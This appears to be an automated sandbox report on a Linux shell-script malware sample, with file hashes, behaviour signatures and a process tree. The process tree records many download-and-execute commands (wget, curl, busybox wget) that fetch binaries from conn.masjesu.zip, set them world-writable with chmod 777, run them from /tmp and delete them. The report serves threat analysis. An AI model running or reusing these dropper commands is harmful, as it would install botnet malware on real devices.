Analysis
-
max time kernel
103s -
max time network
133s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
-
Size
10KB
-
MD5
3ef72a961095a0472a5f608928d2c772
-
SHA1
dc7795456334779680f17d1fd318e7026431bbcc
-
SHA256
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2
-
SHA512
2deda53f3c8abdc9a80c6dccb0cdbf3e089b0f1e8a36747d4a07db5b4c153cfaa6a3e4ee1372ed7319b9b560faf35002fdbcca1033261b85ade67f2b68484c4a
-
SSDEEP
192:u7XDK1NRwo+TE7aAAfGXsQNqi3Ey0AAfGHsQNqiGXDK1NJ:u7XDK1NRwo+o7aAAfGFEtAAfGMXDK1NJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 738 chmod 746 chmod 857 chmod 887 chmod 829 chmod 964 chmod 812 chmod 908 chmod 936 chmod 957 chmod 950 chmod 756 chmod 880 chmod 901 chmod 999 chmod 1006 chmod 894 chmod 971 chmod 943 chmod 978 chmod 985 chmod 992 chmod 780 chmod 822 chmod 873 chmod 922 chmod 915 chmod 929 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 739 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB 747 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl 758 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J 783 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE 813 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj 823 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg 830 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 859 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq 874 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 881 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr 888 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ 895 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX 902 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 909 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 916 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj 923 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg 930 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 937 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq 944 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr 951 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ 958 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX 965 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 972 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE 979 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 986 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB 993 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl 1000 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J 1007 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 750 curl 877 curl 737 busybox 768 curl 876 wget 879 busybox 914 busybox 970 busybox 728 curl 851 busybox 872 busybox 905 curl 907 busybox 928 busybox 998 busybox 1002 wget 821 busybox 828 busybox 890 wget 947 curl 982 curl 991 busybox 743 curl 815 wget 840 curl 884 curl 939 wget 975 curl 989 curl 714 wget 745 busybox 862 wget 912 curl 960 wget 787 wget 826 curl 886 busybox 891 curl 988 wget 749 wget 752 busybox 932 wget 953 wget 825 wget 870 curl 883 wget 981 wget 793 curl 956 busybox 963 busybox 1003 curl 900 busybox 933 curl 954 curl 967 wget 974 wget 984 busybox 742 wget 904 wget 911 wget 995 wget 762 wget 816 curl 832 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg curl File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J curl File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 curl File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ curl File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX curl File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 curl File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 curl File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq curl File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB curl File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J curl File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg curl File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 curl File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 curl File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl curl File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl curl File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr curl File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 curl File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq curl File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr curl File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB curl File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ curl File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE curl File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj curl File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX curl File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 curl File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE curl File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj curl File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 curl
Processes
-
/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:714
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:761
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:762
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:776
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:786
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:787
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:809
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:893
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:921
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:935
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:942
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
